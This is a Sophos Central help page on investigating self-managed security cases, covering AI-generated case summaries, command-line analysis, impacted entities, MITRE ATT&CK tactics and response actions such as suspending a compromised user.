Skip to content

Page permalink

Always use the following permalink when referencing this page. It will remain unchanged in future help versions.

https://docs.sophos.com/central/customer/help/en-us/index.html?contextId=analyze-cases

Investigate cases

This page is only for "Self-managed" cases.

You can investigate cases using information and tools available in the Case details page, as described on this page.

We also recommend that you use our AI assistant to find out more about the detection and get suggestions for taking action. See AI assistant.

Keep a record of your investigation on the Notebook tab in a case's details pages.

In some cases, you can also respond to cases. See Respond to cases.

Investigate a case

To start your investigation, do as follows:

  1. Go to the Cases page.

    Cases page.

  2. Click the Case ID of the case.

    Case ID link in Cases list.

  3. On the Overview tab, you can find information about the detection that generated the case and start your analysis using Sophos AI tools.

    Case "Overview" tab.

On this tab, you can do as follows:

Case summary

You can use Sophos AI to generate a case summary for you.

  1. In Case Summary, click the AI icon.

    Sophos AI analyzes the case and summarizes the details.

    Case summary pane.

  2. If you want to save the summary, click Insert. To discard it, click the "X".

    If you save the summary, you can click the Edit icon Edit icon. and make changes to it.

    Case summary with Insert button.

Alternatively, you can summarize the case manually. Click the Edit icon Edit icon. and enter your summary.

Command line analysis

You can use Sophos AI to analyze the command line run by the threat that generated the case.

In Command Line, click the AI icon.

Command line analysis pane.

Sophos AI analyzes the command line to discover the threat's intentions and possible impact. If necessary, it de-obfuscates code, minimizing the effort needed to assess the threat.

Impacted entities

Impacted Entities lists the devices, users, files, IP addresses, and processes affected by the detected threat.

Click a device name to see its full details in the Computers and servers page.

MITRE tactics

The MITRE tactics pane lists any MITRE ATT&CK tactics and techniques we detected.

Click the fold-out arrow beside a tactic to see the technique.

Click the link beside any tactic or technique, for example Credential Access, to go to its details on the MITRE website.

MITRE tactics details.

Respond to cases

The Response Action feature is currently not available for most third-party product integrations.

In some cases, you can resolve detected issues via third-party products.

To use this feature, you must set up a Response Action integration with the third-party product you want to use. Go to Products and click your product.

Our example shows how to use a response action to suspend a compromised user. To take action, do as follows:

  1. Click the Case ID next to a case to see its details.
  2. Select the Respond tab.

  3. Find the action you want. Click the product type Identity to see actions available for that type.

    Respond tab showing Identity actions.

  4. Click Suspend User.

  5. In the action's details page, enter the required information and a reason for the action.

    Suspend User dialog.

  6. Click Run.